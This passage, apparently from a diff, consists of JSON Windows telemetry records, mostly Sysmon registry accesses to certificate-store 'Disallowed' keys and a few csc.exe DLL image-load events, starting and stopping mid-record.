"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": 